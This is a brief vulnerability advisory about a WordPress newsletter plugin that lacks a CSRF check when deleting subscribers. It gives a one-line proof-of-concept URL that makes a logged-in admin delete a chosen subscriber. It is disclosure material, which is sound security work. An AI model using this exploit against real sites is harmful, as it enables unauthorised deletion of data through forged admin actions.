Description The plugin does not have CSRF check when deleting subscriber, which could allow attackers to make logged in admins perform such action via a CSRF attack
Make an admin open a link where `<RID>` is a valid user:
http://example.com/wp-admin/admin.php?page=wp_newsletter_show_localrecord&action=delete&rid=<RID>